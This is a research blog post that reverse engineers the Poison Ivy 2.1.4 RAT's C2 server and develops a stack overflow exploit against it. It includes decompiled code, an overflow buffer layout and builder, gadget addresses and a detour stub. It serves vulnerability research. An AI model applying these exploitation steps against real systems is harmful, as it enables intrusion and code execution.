Dead RATs: Exploiting malware C2 servers

This post is a follow-up to my post on exploiting a stack buffer overflow in the C2 server of Poison Ivy (>= 2.2.0), which discussed how to exploit that vulnerability without access to the secret key used to encrypt PIVY traffic. In this post I’ll discuss exploiting a vulnerability in DarkComet’s C2 server as well as a new vulnerability affecting earlier versions of Poison Ivy. In both cases I’ll also discuss severe flaws in their cryptographic protocols which allow us to exploit these vulnerabilities without any knowledge of the secret key. Key-independent exploitation is of interest in scenarios where C2 administrators change keys over time, where infected samples are sparsely distributed, where one encounters a series of C2 servers hosting different campaigns or where one actively hunts for C2 servers around the web. Included with this post are some Metasploit modules I made.

A brief note on terminology: throughout this post I’ll refer to the malicious binary running on the infected machine as the ‘client’ and to the command & control (C2) side as the ‘server’. In RAT/bot terminology it is usually the other way around, but in my opinion it makes little sense to talk about a ‘C2 client’.

Intro

These cases are interesting not because they are at the top of the malware foodchain (though, despite their age and problems, they are still surprisingly widely used by cybercriminals and suspected nation-state attackers alike) or because exploiting aging malware is all that exciting. They are interesting because they show how vulnerable code and bad cryptographic protocol design can be combined into pretty powerful exploits, and because they show that malware, like antivirus software (eg. ESET, TrendMicro, Kaspersky, Sophos) or network security equipment (eg. FireEye), is often terribly insecure itself. Just because it’s “security software” doesn’t mean it’s secure software.

Furthermore, there is all sorts of interest in exploiting RAT/botnet C2 servers, ranging from security researchers tracking botnets or taking them over (sometimes targeting exploit kits as well), through the notorious debate on ‘hacking back’ (eg. when Team High Tech Crime of the Dutch police apparently hacked a BlackShades C2 server (source in Dutch)), to three-letter agencies hoovering up bots left and right under the auspices of projects with names like HIDDENSALAMANDER and DEFIANTWARRIOR. What’s interesting about these NSA projects is that HIDDENSALAMANDER seems to focus on tracking and identifying botnet activity via traffic detection (and where possible decoding and processing) while DEFIANTWARRIOR seems to focus on ‘bot herding’, ie. taking over botnets for their own purposes. The slides of the DEFIANTWARRIOR presentation explicitly state such end-goals as using hijacked bots as ‘pervasive network analysis vantage points’ (ie. nodes from which to observe networks otherwise out of reach) or ‘throw-away non-attributable CNA nodes’ (ie. to serve as proxies, potentially for hacking). The slides discuss how the XKEYSCORE system can be used to identify exploitable bots and how the TURMOIL system can then be tasked to watch for such traffic, with TURBINE generating a Man-On-The-Side (MOTS) packet to hijack control of the bot.

Tellingly, the slides give some insight into the NSA’s concern for attribution-avoidance as a motivating factor by stating they wish to ‘walk the line: be awesome enough to be useful and not get caught trivially, but not as awesome as a state actor and notice when we do get burned’. All in all, exploitation of malware (botnet/RAT C2 servers, exploit kit control panels, etc.) is a pretty interesting and understudied subject.

Poison Ivy 2.1.x

The PIVY vulnerability I mentioned earlier affects versions 2.2.0 through 2.3.2 (the final release). I noted that PIVY versions before 2.2.0 were affected neither by this vulnerability nor by the encryption oracle I discovered, since the PIVY protocol prior to 2.2.0 is different and uses the RC4 stream cipher rather than the Camellia block cipher. Since the vulnerability in versions 2.2.0 and up always struck me as rather weird (almost looking like a ‘bugdoor’, as noted by Gal Badishi), I decided some time ago to take a look at older versions of PIVY to see if similar flaws were present there and, if so, to provide a working exploit, making the C2 servers of most (if not all) of the PIVY family exploitable. As listed by megasecurity there are several PIVY versions preceding 2.2.0, but I decided to start by looking at 2.1.4 (released in May 2006, a decade ago).

Reverse Engineering the PIVY 2.1.4 C2 server

I started out by downloading an old copy of the PIVY 2.1.4 release and going through the usual static RE steps (doing the reversing on a Windows XP SP3 (32-bit) VM seeing as how PIVY is quite a relic):

> file "PI 2.1.4.exe"
PI 2.1.4.exe; PE32 executable for MS Windows (GUI) Intel 80386 32-bit

> trid.exe "PI 2.1.4.exe"

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  6880
Analyzing...

Collecting data from file: PI 2.1.4.exe
 46.9% (.EXE) Win32 Executable Borland Delphi 7 (664799/41/58)
 31.8% (.EXE) Win32 Executable Borland Delphi 5 (451463/56/28)
 18.5% (.EXE) Win32 Executable Borland Delphi 6 (262644/60)
  1.0% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  0.9% (.SCR) Windows screen saver (13101/52/3)

Looks like we’re dealing with an unpacked/non-crypted binary developed with Borland Delphi so static analysis through disassembly and decompilation should be easy enough. However, in order to speed things up a bit (since we don’t need a comprehensive understanding of the entire application to find a suitable vulnerability) we want to identify the network communications handling routine since if there is a similar vuln to that of later versions it’s probably located there. One way to do this is to look for references to WSAStartup, bind, etc. and work out what’s happening from there. Another way is to rely on the fact that PIVY 2.1.4 advertises itself as having ‘transparent compression of transfers and communications’ and we know newer versions of PIVY did this by using RtlCompressBuffer & RtlDecompressBuffer functions with the COMPRESSION_FORMAT_LZNT1 algorithm so we can look for references to those APIs and check out the routines using them. We run the PIVY C2 through a debugger, set a breakpoint on RtlDecompressBuffer, fire up an infected client on a VM so the communication will trigger the right routine and trace our way back to where we were called from. This points us to a routine I dubbed socket_reader. After decompilation and some variable renaming we can see the following core elements of the relevant function:

DWORD __usercall socket_reader@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>, LPVOID lpThreadParameter)
{
  (...)
  char dstBuffer; // [sp+126h] [bp-2586h]@12
  char compressedBuffer; // [sp+1577h] [bp-1135h]@12
  char srcBuffer; // [sp+157Bh] [bp-1131h]@18
  fd_set readfds; // [sp+2578h] [bp-134h]@1
  int compressionType; // [sp+267Ch] [bp-30h]@1
  int decompressionSize; // [sp+2680h] [bp-2Ch]@17
  int pDestinationSize; // [sp+2684h] [bp-28h]@17
  int infoSize; // [sp+2688h] [bp-24h]@14
  unsigned int headerAllocSize; // [sp+268Ch] [bp-20h]@1
  LPVOID decompressBuffer; // [sp+2690h] [bp-1Ch]@8
  LPARAM lParam; // [sp+2696h] [bp-16h]@2
  struct timeval timeout; // [sp+269Ch] [bp-10h]@2
  HWND hWnd; // [sp+26A4h] [bp-8h]@1
  SOCKET s; // [sp+26A8h] [bp-4h]@1
  int savedregs; // [sp+26ACh] [bp+0h]@1

  v16 = a1;
  v15 = a3;
  v14 = a2;
  hWnd = (HWND)*((_DWORD *)lpThreadParameter + 1);
  s = *(_DWORD *)lpThreadParameter;
  headerAllocSize = 0;
  compressionType = 2;

  (...)

  while ( 1 )
  {
    (...)

    if ( *(LPARAM *)((char *)&lParam + 2) <= headerAllocSize )
    {
      Windows::ZeroMemory(decompressBuffer, *(LPARAM *)((char *)&lParam + 2));
    }
    else
    {
      if ( headerAllocSize )
        VirtualFree_0(decompressBuffer, 0, 0x8000u);
      decompressBuffer = VirtualAlloc_0(0, *(LPARAM *)((char *)&lParam + 2), 0x1000u, 4u);
      headerAllocSize = *(LPARAM *)((char *)&lParam + 2);
    }
    v19 = 0i64;
    while ( *(unsigned int *)((char *)&lParam + 2) > (signed __int64)(unsigned int)v19 )
    {
      Windows::ZeroMemory(&compressedBuffer, 0x1001u);
      Windows::ZeroMemory(&dstBuffer, 0x1451u);

      (...)

      if ( select(0, &readfds, 0, 0, &timeout) <= 0 )
      {
        __writefsdword(0, (unsigned int)v8);
        break;
      }
      __writefsdword(0, (unsigned int)v8);
      infoSize = 0;
      if ( !(unsigned __int8)sub_4950A4(&s, &infoSize, 4) || !(unsigned __int8)sub_4950A4(&s, &compressedBuffer, infoSize) )
      {
        break;
      }
      v5 = infoSize;
      if ( infoSize )
      {
        sub_4E78F4((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);
        sub_407800(&decompressionSize, &compressedBuffer, 4);
        pDestinationSize = decompressionSize;
        if ( v5 - 4 == decompressionSize )
        {
          System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);
        }
        else
        {
          RtlDecompressBuffer(compressionType, &dstBuffer, decompressionSize, &srcBuffer, v5 - 4, &pDestinationSize);
          System::Move(&dstBuffer, (char *)decompressBuffer + v19, pDestinationSize);
        }
        v19 += (unsigned int)decompressionSize;
        wParam += (unsigned int)(v5 - 4);
        v20 = GetTickCount_0() - v4;
        v21 = 0;
        PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
      }
    }

Now that we have an ‘area of interest’ to scrutinize carefully later, the next thing we want some clarity on is the PIVY 2.1.x protocol, or at least what we need to know about it in order to comfortably do further reversing and exploitation. I simply used Wireshark to capture several server-client sessions. This process revealed the following protocol structure, which differs significantly from that of PIVY >= 2.2.0:

Infected -> C2:
0x01

C2 -> Infected:
{binary blob}

Infected -> C2:
{binary blob}

I suspected the first binary blob (transmitted from C2 to infected client) would contain information and code the infected client would use and run (seeing as how PIVY clients are very lean and get a lot of their malicious code dynamically from the C2 server) and the second binary blob would be an informational message (probably some ‘new client announcement’ message). In order to get a clearer look at what’s inside that first binary blob, I looked at which parts of the blob remained constant despite changes in cryptographic keys to identify what was plaintext and what was ciphertext, assuming the plaintext would be some sort of initial PIVY protocol metadata. This revealed that the first 0xB9E bytes were plaintext (with the first 0x1E4 bytes of that being consistently constant) and that the 0x855 succeeding bytes were highly entropic (and thus probably ciphertext).
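The comparison described above can be sketched roughly as follows. This is a minimal illustration, not the tooling I actually used: the two ‘captures’ are synthetic stand-ins (not real PIVY traffic) and the function names are made up for the example.

```python
import math
import os
from collections import Counter


def common_prefix_len(a: bytes, b: bytes) -> int:
    """Number of leading bytes that are identical in both captures."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0 for constant data, at most 8)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum(c / total * math.log2(c / total) for c in counts.values())


# Synthetic stand-ins for two blobs captured under different keys:
# a shared plaintext part followed by key-dependent, random-looking bytes.
shared = b"\x89\xff" + b"A" * 0x100
capture_a = shared + os.urandom(0x855)
capture_b = shared + os.urandom(0x855)

split = common_prefix_len(capture_a, capture_b)
print("constant prefix:", hex(split))
print("entropy before split:", round(shannon_entropy(capture_a[:split]), 2))
print("entropy after split:", round(shannon_entropy(capture_a[split:]), 2))
```

A constant prefix across keys hints at plaintext, while a tail close to 8 bits per byte hints at ciphertext (or compressed data, which is why the two checks are best used together).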

In order to understand how the sent packets are structured I simply put a breakpoint on the send API, ran the C2 server, started up my MITM script and the infected client and waited until the server hit the breakpoint. Then the MITM script would show what had been sent in one go and to what routine within PIVY it would return. This revealed the binary blob actually consisted of several ‘packets’ (at the PIVY-protocol level) structured roughly as follows:

- PACKET 1 (0xB9E bytes):
	- 0x1E4 bytes segment (PLAINTEXT)
		[89]: identifier
		[ff]: cmd
		[900b0000]: little endian length dword (decompressed length for allocation)

	- 0x1DE bytes segment (PLAINTEXT)
		[940b0000]: little endian length dword
		(...): intermediate bytes
		[ba090000]: little endian length dword (next segment size)

	- 0x9BA bytes segment (PLAINTEXT)
		(...): some bytes

- PACKET 2 (0x855 bytes):
	- (ENCRYPTED)
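As a small aid for reading captures, the 6-byte header shown above (identifier, cmd, little endian length dword) can be unpacked like this. It is only a sketch: the field names follow my own labels in the listing and parse_header is a hypothetical helper, not something taken from PIVY.

```python
import struct


def parse_header(raw: bytes):
    """Split a 6-byte header into (identifier, cmd, length)."""
    if len(raw) < 6:
        raise ValueError("header needs at least 6 bytes")
    # '<' = little endian without padding, B = 1 byte, I = 4-byte dword
    return struct.unpack("<BBI", raw[:6])


ident, cmd, length = parse_header(bytes.fromhex("89ff900b0000"))
print(hex(ident), hex(cmd), hex(length))
```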

Within the routines doing the sending, receiving, compressing and decompressing there had to be a call to the encryption/decryption function which can be found quite quickly if you know how to identify RC4 (hint: two subsequent loops iterating over 0x100 elements for the s-box key scheduler and a streaming loop doing mod-0x100 indexing of this s-box and xoring the end-result with the plaintext):

sub_4E786C((int)&v17, (int)lpThreadParameter + 12);
if ( !(unsigned __int8)sub_4950A4(&s, (int)&lParam, 6) )
	goto LABEL_23;
sub_4E78F4((int)&v17, (int)&lParam, (int)&lParam, 6);

(...)

sub_4E78F4((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);

We can recognize sub_4E786C as an implementation of the RC4 key-scheduling algorithm (KSA), with a hardcoded 11 byte (88-bit) limit on the key, and sub_4E78F4 as an implementation of the RC4 keystream generator (PRGA) combined with the encryption/decryption XOR:

int __stdcall sub_4E786C(int a1, int a2)
{
  int v2; // eax@1
  unsigned __int8 v3; // dl@3
  signed int v4; // esi@3
  int result; // eax@3
  char v6; // cl@5
  char v7; // ST13_1@9

  *(_BYTE *)(a1 + 256) = 0;
  *(_BYTE *)(a1 + 257) = 0;
  v2 = 0;
  do
  {
    *(_BYTE *)(a1 + (unsigned __int8)v2) = v2;
    ++v2;
  }
  while ( (_BYTE)v2 );
  v3 = 0;
  v4 = 0;
  result = 0;
  do
  {
    if ( v4 >= 11 )
      v6 = 0;
    else
      v6 = *(_BYTE *)(a2 + v4);
    if ( ++v4 >= 11 )
      v4 = 0;
    v3 += *(_BYTE *)(a1 + (unsigned __int8)result) + v6;
    v7 = *(_BYTE *)(a1 + (unsigned __int8)result);
    *(_BYTE *)(a1 + (unsigned __int8)result) = *(_BYTE *)(a1 + v3);
    *(_BYTE *)(a1 + v3) = v7;
    ++result;
  }
  while ( (_BYTE)result );
  return result;
}

int __stdcall sub_4E78F4(int a1, int a2, int a3, int a4)
{
  int v4; // esi@1
  int v5; // ecx@1
  char v6; // dl@2

  v4 = a4;
  v5 = 0;
  do
  {
    v6 = *(_BYTE *)(a1 + ++*(_BYTE *)(a1 + 256));
    *(_BYTE *)(a1 + 257) += v6;
    *(_BYTE *)(a1 + *(_BYTE *)(a1 + 256)) = *(_BYTE *)(a1 + *(_BYTE *)(a1 + 257));
    *(_BYTE *)(a1 + *(_BYTE *)(a1 + 257)) = v6;
    *(_BYTE *)(a3 + v5) = *(_BYTE *)(a1 + (unsigned __int8)(*(_BYTE *)(a1 + *(_BYTE *)(a1 + 256)) + v6)) ^ *(_BYTE *)(a2 + v5);
    ++v5;
    --v4;
  }
  while ( v4 );
  return a4;
}
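For readers who prefer something more readable than decompiler output, here is a rough Python equivalent of the two routines above. It is a sketch under my own naming (RC4, pivy_key), assuming the operator password is cut or null-padded to 11 bytes as discussed in this post; like the original, it keeps its state between calls so consecutive messages continue the same keystream.

```python
class RC4:
    """Plain RC4 with persistent state across crypt() calls."""

    def __init__(self, key: bytes):
        if not key:
            raise ValueError("key must not be empty")
        self.S = list(range(256))
        j = 0
        # Key scheduling (KSA): the key bytes are cycled over 256 rounds.
        for i in range(256):
            j = (j + self.S[i] + key[i % len(key)]) & 0xFF
            self.S[i], self.S[j] = self.S[j], self.S[i]
        self.i = 0
        self.j = 0

    def crypt(self, data: bytes) -> bytes:
        """Encrypt or decrypt (same operation) and advance the keystream."""
        S = self.S
        out = bytearray()
        for byte in data:
            self.i = (self.i + 1) & 0xFF
            self.j = (self.j + S[self.i]) & 0xFF
            S[self.i], S[self.j] = S[self.j], S[self.i]
            out.append(byte ^ S[(S[self.i] + S[self.j]) & 0xFF])
        return bytes(out)


def pivy_key(password: bytes) -> bytes:
    """Cut or null-pad the password to the 11 bytes the KSA consumes."""
    return password[:11].ljust(11, b"\x00")


# Example password only; both ends derive the same keystream from it.
sender = RC4(pivy_key(b"example"))
receiver = RC4(pivy_key(b"example"))
header = bytes.fromhex("8900690c0000")
print(receiver.crypt(sender.crypt(header)) == header)
```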

As RC4 never explicitly required the use of an IV, one is, of course, omitted. The password specified by the operator of the C2 is either cut to 11 bytes or padded with null-bytes, so the cipher is initialized as rc4_ksa(pad(password)). Now that we know a bit more about the internal workings of the PIVY 2.1.x protocol we can take some of our captured data and decrypt it to see what’s being sent around without having to do tedious extra dynamic RE:

- PACKET 2 (0x855 bytes):
	- 6 bytes segment (ENCRYPTED)
		[89]: identifier
		[00]: cmd
		[690C0000]: little endian length dword

	- 0x84F bytes segment
		[4B080000]: length of packetdata to follow (PLAINTEXT)

		- 0x84B bytes (ENCRYPTED)
			[E(690C0000)]: 4 bytes specifying decompressed size
			[...]: y bytes of compressed payload
			[...]: ....?

It turns out parts of the data being sent around here are constant (being compressed malicious code), which is good to keep in mind for the later stage where we will have to attack the crypto to get reliable exploitation.

Finding a vulnerability

Now that we have a rough idea of the first stages of the protocol and a notion of where and how the packet processing happens, that should be enough to find a vulnerability right? Let’s take a look at this really interesting sequence in socket_reader:

  char dstBuffer; // [sp+126h] [bp-2586h]@12
  char compressedBuffer; // [sp+1577h] [bp-1135h]@12

  (...)

      if ( !(unsigned __int8)recv_from(&s, (int)&infoSize, 4)
        || !(unsigned __int8)recv_from(&s, (int)&compressedBuffer, infoSize) )
      {
        break;
      }
      v5 = infoSize;
      if ( infoSize )
      {
        rc4_crypt((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);
        sub_407800(&decompressionSize, &compressedBuffer, 4);
        pDestinationSize = decompressionSize;
        if ( v5 - 4 == decompressionSize )
        {
          System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);
        }
        else
        {
          RtlDecompressBuffer(compressionType, &dstBuffer, decompressionSize, &srcBuffer, v5 - 4, &pDestinationSize);
          System::Move(&dstBuffer, (char *)decompressBuffer + v19, pDestinationSize);
        }

Where recv_from (sub_4950A4 in the raw decompilation) looks as follows:

int __fastcall sub_4950A4(SOCKET *a1, int a2, int a3)
{
  int v3; // esi@1
  int v4; // ebp@1
  SOCKET *v5; // ebx@1
  int v6; // edi@1
  int result; // eax@2
  char v8; // [sp+0h] [bp-14h]@1

  v3 = a3;
  v4 = a2;
  v5 = a1;
  v8 = 0;
  v6 = 0;
  while ( 1 )
  {
    result = recv(*v5, (char *)(v6 + v4), v3, 0);
    if ( result == -1 || !result || *v5 == -1 || !*v5 )
      break;
    v6 += result;
    v3 -= result;
    if ( !v3 )
    {
      v8 = 1;
      break;
    }
  }
  LOBYTE(result) = v8;
  return result;
}

If you look carefully you can see that recv is called here with a length taken from argument a3, which is 4 for the first call (receiving the length field) but infoSize for the second call (the length field that was just received). We can also see that the buffer recv_from writes to (argument a2) in the second call is compressedBuffer, a fixed-size stack buffer. There are, however, no bounds checks on infoSize, which is received directly from the network, which means we’ve got ourselves a stack buffer overflow here. And while this one is different from the vulnerability in PIVY >= 2.2.0 it’s equally obvious, meaning PIVY C2 servers have always been vulnerable down to at least 2.1.x.

Exploiting the vulnerability: gaining EIP control

The next step here is to exploit this stack buffer overflow into gaining arbitrary code execution on the C2 server. We can overflow compressedBuffer into the saved return address on the stack:

-00001135 compressedBuffer db ?
(...)
-00000134 readfds         fd_set ?
-00000030 compressionType dd ?
-0000002C decompressionSize dd ?
-00000028 pDestinationSize dd ?
-00000024 infoSize        dd ?
-00000020 headerAllocSize dd ?
-0000001C decompressBuffer dd ?                   ; offset
-00000018                 db ? ; undefined
-00000017                 db ? ; undefined
-00000016 lParam          dd ?
-00000012                 db ? ; undefined
-00000011                 db ? ; undefined
-00000010 timeout         timeval ?
-00000008 hWnd            dd ?                    ; offset
-00000004 s               dd ?
+00000000  s              db 4 dup(?) <--- saved register (framepointer)
+00000004  r              db 4 dup(?) <--- saved return address on stack
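The distances involved follow directly from the frame offsets in the listing above. The small sketch below just does that arithmetic; the constant names are mine, and the srcBuffer offset is taken from the decompiler output earlier in this post.

```python
# Frame offsets relative to the frame pointer, as shown in the stack layout.
COMPRESSED_BUFFER = -0x1135
SRC_BUFFER = -0x1131        # from the decompiled variable list
READFDS = -0x134
DECOMPRESS_BUFFER_PTR = -0x1C
SAVED_FRAME_POINTER = 0x0
SAVED_RETURN_ADDRESS = 0x4


def offset_from_buffer(frame_offset: int) -> int:
    """Byte offset of a stack slot measured from the start of compressedBuffer."""
    return frame_offset - COMPRESSED_BUFFER


print("readfds starts at           ", hex(offset_from_buffer(READFDS)))
print("decompressBuffer pointer at ", hex(offset_from_buffer(DECOMPRESS_BUFFER_PTR)))
print("saved return address at     ", hex(offset_from_buffer(SAVED_RETURN_ADDRESS)))
# Bytes that must be received to fully overwrite the saved return address:
print("bytes needed                ", hex(offset_from_buffer(SAVED_RETURN_ADDRESS) + 4))
```

So anything beyond 0x1001 bytes starts clobbering the locals behind the buffer, and 0x113D bytes are enough to replace the saved return address.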

This means that in order to get EIP-control we will have to:

Craft a packet that triggers the overflow
Make sure the control-flow reaches the end of the function and returns properly so we get EIP-control

The first we can do by crafting a packet of the form:

[mal_header (6 bytes)] [flen (4 bytes)] [infoLen (4 bytes)] [compressedBuffer (0xFFD bytes)] [readfds (0x104 bytes)] [compressionType (4 bytes)] [decompressSize (4 bytes)] [pDestinationSize (4 bytes)] [infoSize (4 bytes)] [headerAllocSize (4 bytes)] [decompressBuffer (4 bytes)] [junk (16 bytes)] [hWnd (4 bytes)] [socket s (4 bytes)] [saved s (4 bytes)] [saved r (4 bytes)]

Where:

infoLen = payloadlen
infoSize = infoLen + 4
flen = size of following data blob
saved r = target EIP

And mal_header is the ciphertext of "\x89\x01" + pack('I', allocSize), where allocSize is the length of the entire above buffer (save for the 6 mal_header bytes) plus 1024. This mal_header is the initial packet header, crafted to accommodate the following code (from socket_reader):

 if ( !(unsigned __int8)recv_from(&s, (int)&lParam, 6) )
      goto LABEL_23;
    rc4_crypt((int)&v17, (int)&lParam, (int)&lParam, 6);
    if ( (_BYTE)lParam != 0x89u )
      goto LABEL_23;
    v4 = GetTickCount_0();
    Windows::ZeroMemory(&wParam, 0x20u);
    v22 = *(LPARAM *)((char *)&lParam + 2);
    v23 = 0;
    PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
    if ( *(LPARAM *)((char *)&lParam + 2) <= headerAllocSize )
    {
      Windows::ZeroMemory(decompressBuffer, *(LPARAM *)((char *)&lParam + 2));
    }
    else
    {
      if ( headerAllocSize )
        VirtualFree_0(decompressBuffer, 0, 0x8000u);
      decompressBuffer = VirtualAlloc_0(0, *(LPARAM *)((char *)&lParam + 2), 0x1000u, 4u);
      headerAllocSize = *(LPARAM *)((char *)&lParam + 2);
    }
    v19 = 0i64;
    while ( *(unsigned int *)((char *)&lParam + 2) > (signed __int64)(unsigned int)v19 )
    {
      Windows::ZeroMemory(&compressedBuffer, 0x1001u);
      Windows::ZeroMemory(&dstBuffer, 0x1451u);

Here we can see it receives 6 bytes from the network, decrypts them, checks if the first byte is 0x89 and if so treats the DWORD at offset 2 as a size field for a buffer to be allocated. If a buffer of that size or larger was already allocated the code merely cleans that buffer memory, otherwise it frees any older buffer and allocates a new one using VirtualAlloc. The code then continues onto the vulnerable part where this line handles the rest of the packet:

 if ( !(unsigned __int8)recv_from(&s, (int)&infoSize, 4) || !(unsigned __int8)recv_from(&s, (int)&compressedBuffer, infoSize) )

First it receives the infoSize field and then reads infoSize bytes from the network. The function then continues onward as follows:

      v5 = infoSize;
      if ( infoSize )
      {
        rc4_crypt((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);
        sub_407800(&decompressionSize, &compressedBuffer, 4);
        pDestinationSize = decompressionSize;
        if ( v5 - 4 == decompressionSize )
        {
          System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);
        }
        else
        {
          RtlDecompressBuffer(compressionType, &dstBuffer, decompressionSize, &srcBuffer, v5 - 4, &pDestinationSize);
          System::Move(&dstBuffer, (char *)decompressBuffer + v19, pDestinationSize);
        }
        v19 += (unsigned int)decompressionSize;
        wParam += (unsigned int)(v5 - 4);
        v20 = GetTickCount_0() - v4;
        v21 = 0;
        PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
      }
    }
    v10 = &savedregs;
    v9 = &loc_4F08F7;
    v8 = (HWND)__readfsdword(0);
    __writefsdword(0, (unsigned int)&v8);
    Windows::ZeroMemory(&v17, 0x102u);
    SendMessageA(*((HWND *)lpThreadParameter + 2), 0x402u, wParam + 6, v19 + 6);
    Windows::ZeroMemory(&wParam, 0x20u);
    PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
    SendMessageA(hWnd, 0x401u, (WPARAM)decompressBuffer, (LPARAM)&lParam);
    __writefsdword(0, (unsigned int)v8);
  }
  __writefsdword(0, (unsigned int)v8);
LABEL_23:
  __writefsdword(0, (unsigned int)v11);
  v13 = (int *)&loc_4F0977;
  v12 = &savedregs;
  v11 = &loc_4F0965;
  v10 = (int *)__readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  v9 = 0;
  v8 = hWnd;
  v6 = (HWND)Controls::TWinControl::GetHandle((Controls::TWinControl *)*off_51AA4C);
  SendMessageA(v6, 0x404u, (WPARAM)v8, (LPARAM)v9);
  closesocket(s);
  System::__linkproc__ FreeMem(lpThreadParameter);
  result = 0;
  __writefsdword(0, (unsigned int)v10);
  return result;

In order to gain EIP-control we need to ensure the code arrives without problems at the function return and to ease exploitation we want to avoid having to deal with decompression of our code (on top of the encryption already bothering us) as well as have any payload and exploit-critical data we embed ‘survive’ the ZeroMemory calls in between. As such we have to take particular care in setting the following elements of our buffer:

The DWORD that will overwrite the decompressSize value
The DWORD that will overwrite the infoSize value
The DWORD that will overwrite the decompressBuffer pointer

The first two will determine whether decompression will take place or not while the third one will be the destination address of a Move call (which is more or less Delphi’s memcpy with form move(src, dst, len)).

The PostMessageA call can deal with an invalid hWnd and the ZeroMemory calls merely determine where we don’t want to place any shellcode we might want to include in our buffer seeing as how they don’t zero out any areas we care about after the saved return address has been overwritten.
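To make the buffer layout from earlier in this section a bit more tangible, here is a sketch that only assembles the plaintext fields in the order listed. It is not the Metasploit module: encryption is deliberately left out, build_layout is a hypothetical helper, and every filler value (zeros for readfds, hWnd, socket and so on) is a placeholder I picked for illustration rather than a value from a working exploit.

```python
import struct

SRC_LEN = 0xFFD       # remainder of compressedBuffer after the 4-byte infoLen
READFDS_LEN = 0x104


def dword(value: int) -> bytes:
    return struct.pack("<I", value)


def build_layout(payload: bytes, dest_addr: int, ret_addr: int):
    """Return (plaintext header, plaintext body) following the field order above."""
    if len(payload) > SRC_LEN:
        raise ValueError("payload does not fit in the buffer")
    info_len = len(payload)                  # infoLen = payloadlen
    body = b"".join([
        dword(info_len),                     # infoLen
        payload.ljust(SRC_LEN, b"\x00"),     # rest of compressedBuffer
        b"\x00" * READFDS_LEN,               # readfds (placeholder)
        dword(2),                            # compressionType (2, as in the code)
        dword(info_len),                     # decompressSize
        dword(info_len),                     # pDestinationSize
        dword(info_len + 4),                 # infoSize = infoLen + 4
        dword(0),                            # headerAllocSize (placeholder)
        dword(dest_addr),                    # decompressBuffer: Move destination
        b"\x00" * 16,                        # junk
        dword(0),                            # hWnd (placeholder)
        dword(0),                            # socket s (placeholder)
        dword(0),                            # saved s (placeholder)
        dword(ret_addr),                     # saved r = target EIP
    ])
    blob = dword(len(body)) + body           # flen = size of following data blob
    alloc_size = len(blob) + 1024            # everything after the header, plus 1024
    header = b"\x89\x01" + dword(alloc_size)
    return header, blob


header, blob = build_layout(b"\xcc" * 8, 0x41414141, 0xDEADBEEF)
print(len(header), hex(len(blob)))
```

The body comes out at 0x113D bytes, which is exactly the distance from the start of compressedBuffer up to and including the saved return address.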

In order to test this we will have to know the secret RC4 key in order to encrypt our packet (since it will be decrypted before the function returns and we gain EIP-control) so for now we simply assume we are attacking a C2 server for which we have a corresponding infected client from which we extracted the password/key. Combining the above information allows us to hijack control-flow and redirect it to eg. 0xdeadbeef as can be seen in the Immunity Debugger screenshot below:

[Image: eip_control]

Exploiting the vulnerability: from EIP control to arbitrary code execution

Now that we have EIP control we can craft an arbitrary code execution scenario. Usually this is the point to start worrying about exploit mitigations such as DEP, ASLR, stack cookies, etc. but luckily for us none of this is in play here, as PIVY is a non-DEP, non-ASLR compatible executable, which means we don’t have to worry about any of that.

Usually we would go for a simple jmp esp + shellcode append scenario here but there’s one problem: the exploited function’s stackframe resides near its thread’s stacktop meaning we barely have any space for a decent payload there:

[Image: stacktop]

We can address this problem by using a small ‘detouring shellcode’ appended to our buffer which redirects control-flow to the actual shellcode located somewhere within our buffer. The only problem here is that by the time we reach the vulnerable function return, most of the buffer is eradicated by ZeroMemory calls meaning our shellcode is erased by the time control-flow reaches it. It turns out, however, we have a very powerful exploitation primitive to address this issue as well:

System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);

Here we have full control over all parameters to that previously pesky Move call, which means we have a Write-Anything-Anywhere (WAA) primitive that is called before any of our buffer gets erased. We can use this primitive to copy decompressionSize bytes from the srcBuffer part of our packet to the address we overwrote the decompressBuffer pointer with. Now all we need is a suitable destination where we will ‘back up’ our shellcode, and then we can overwrite the saved return address with the address of a jmp esp which will execute the tiny ‘detour shellcode’ redirecting control-flow to the shellcode-backup area. I chose the start of the .tls section (0x00520000) for this purpose. The detour shellcode is a simple mov eax, 0x00520000; jmp eax sequence and the jmp esp can be found at address 0x00469159 in ‘PI 2.1.4.exe’ (amid what amounts to a treasure chest of gadgets):

CODE:00469155 ; ---------------------------------------------------------------------------
CODE:00469155                 jmp     esi
CODE:00469157 ; ---------------------------------------------------------------------------
CODE:00469157                 jmp     ebp
CODE:00469159 ; ---------------------------------------------------------------------------
CODE:00469159                 jmp     esp
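For reference, the detour sequence is only seven bytes on 32-bit x86: opcode B8 followed by a little endian imm32 for mov eax, imm32 and FF E0 for jmp eax. A small sketch of how the two pieces could be assembled by hand (detour_stub is a made-up helper name, the addresses are the ones mentioned above):

```python
import struct

TLS_START = 0x00520000   # shellcode backup area chosen above
JMP_ESP = 0x00469159     # address of the jmp esp in the listing above


def detour_stub(target: int) -> bytes:
    """mov eax, target ; jmp eax"""
    return b"\xB8" + struct.pack("<I", target) + b"\xFF\xE0"


stub = detour_stub(TLS_START)
saved_return = struct.pack("<I", JMP_ESP)
print(stub.hex(), saved_return.hex())
```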

